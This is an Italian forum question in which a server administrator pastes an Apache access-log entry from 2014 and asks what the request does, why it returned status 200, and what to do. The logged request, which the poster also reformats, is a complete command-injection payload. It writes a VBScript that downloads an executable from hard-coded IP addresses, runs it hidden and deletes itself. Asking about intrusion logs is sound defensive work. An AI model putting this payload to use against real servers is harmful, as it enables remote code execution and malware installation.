Ho trovato questa richiesta nel mio access.log di Ubuntu 14.04 apache2:
xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 9975 "-" "-"
Le mie domande sono:
- Che cosa fa questo script?
- Perché il codice risultato è 200?
- Ci sono azioni che dovrei prendere?
Formattato un po ', la richiesta assomiglia a:
xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400]
"GET /?search==%00
{
.exec|cmd.exe /c echo>22222.vbs dim wait,quit,out:
Set xml=CreateObject("Microsoft.XMLHTTP"):
Set WshShell = Wscript.CreateObject("WScript.Shell") :
DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"):
for each Url in DS:
wait=true:
quit=false:
D(Url):
if quit then:
exit for:
end if:
next:
Sub D(Url):
if IsObject(xml)=false then:
Set xml=CreateObject("Microsoft.XMLHTTP"):
end if :
xml.Open "GET","http://"^&Url^&"/getsetup.exe",True:
xml.OnReadyStateChange=GetRef("xmlstat"):
out=Now:
xml.Send():
while(wait and 60^>abs(datediff("s",Now,out))):
wscript.sleep(1000):
wend:
End Sub:
sub xmlstat():
If xml.ReadyState^<^>4 Then:
exit sub:
end if:
wait=false:
if xml.status^<^>200 then:
exit sub:
end if:
quit=true:
on error resume next:
set sGet=CreateObject("ADODB.Stream"):
sGet.Mode=3:
sGet.Type=1:
sGet.Open():
sGet.Write xml.ResponseBody:
sGet.SaveToFile "ko.exe",2:
End sub:
WshShell.run "ko.exe",0,0:
Set fso =CreateObject("Scripting.Filesystemobject") :
fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.
}
HTTP/1.1" 200 9975 "-" "-"
(Sentiti libero di correggere la mia formattazione)